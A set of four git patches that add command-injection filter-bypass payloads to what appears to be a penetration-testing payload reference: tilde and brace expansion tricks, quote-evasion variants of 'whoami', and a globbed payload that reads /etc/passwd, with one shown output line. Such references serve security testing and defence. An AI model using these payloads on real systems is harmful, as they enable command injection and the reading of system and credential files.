From 1a475b6e1d8ba0549d0176d8cabd436c897bd659 Mon Sep 17 00:00:00 2001 From: Xhoenix <86168235+Xhoenix@users.noreply.github.com> Date: Mon, 15 Jul 2024 11:58:02 +0530 Subject: [PATCH 1/4] added bypass techniques --- Command Injection/README.md | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index d0ce9cd..1a2df3b 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -15,6 +15,8 @@ * [Bypass with a line return](#bypass-with-a-line-return) * [Bypass with backslash newline](#bypass-with-backslash-newline) * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) + * [Bypass with Tilde expansion](#bypass-with-tilde-expansion) + * [Bypass characters filter](#bypass-characters-filter) * [Bypass blacklisted words](#bypass-blacklisted-words) * [Bypass with single quote](#bypass-with-single-quote) * [Bypass with double quote](#bypass-with-double-quote) @@ -217,6 +219,12 @@ swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)` root:x:0:0:root:/root:/bin/bash ``` +### Bypass with Tilde expansion + +```powershell +echo ~+ +echo ~- +``` ### Bypass characters filter From 80707e805b3ba98fef29e103c896287986fc2116 Mon Sep 17 00:00:00 2001 From: Xhoenix <86168235+Xhoenix@users.noreply.github.com> Date: Thu, 25 Jul 2024 11:57:43 +0530 Subject: [PATCH 2/4] added bypass techniques --- Command Injection/README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index 1a2df3b..08026da 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -16,6 +16,7 @@ * [Bypass with backslash newline](#bypass-with-backslash-newline) * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding) * [Bypass with Tilde expansion](#bypass-with-tilde-expansion) + * [Bypass with Brace expansion](#bypass-with-brace-expansion) * [Bypass characters filter](#bypass-characters-filter) * [Bypass blacklisted words](#bypass-blacklisted-words) * [Bypass with single quote](#bypass-with-single-quote) @@ -226,6 +227,16 @@ echo ~+ echo ~- ``` +### Bypass with Brace expansion + +```powershell +{,ip,a} +{,ifconfig} +{,ifconfig,eth0} +{l,-lh}s +``` + + ### Bypass characters filter Commands execution without backslash and slash - linux bash From 77f83c18b35b2f5c4462058d2a8f2ab187c85deb Mon Sep 17 00:00:00 2001 From: Xhoenix <86168235+Xhoenix@users.noreply.github.com> Date: Fri, 6 Sep 2024 19:09:46 +0530 Subject: [PATCH 3/4] update quote evasion payloads --- Command Injection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index 08026da..015c623 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -266,6 +266,7 @@ root:x:0:0:root:/root:/bin/bash ```powershell w'h'o'am'i wh''oami +'w'hoami ``` #### Bypass with double quote @@ -273,6 +274,7 @@ wh''oami ```powershell w"h"o"am"i wh""oami +"wh"oami ``` #### Bypass with backticks From 04eb1eb12d847fdd0e22b38d2b145d8163fcb92e Mon Sep 17 00:00:00 2001 From: Xhoenix <86168235+Xhoenix@users.noreply.github.com> Date: Tue, 17 Sep 2024 22:29:37 +0530 Subject: [PATCH 4/4] Update README.md added more payloads --- Command Injection/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Command Injection/README.md b/Command Injection/README.md index 015c623..fbbaf51 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -234,6 +234,9 @@ echo ~- {,ifconfig} {,ifconfig,eth0} {l,-lh}s +{,echo,#test} +{,$"whoami",} +{,/?s?/?i?/c?t,/e??/p??s??,} ```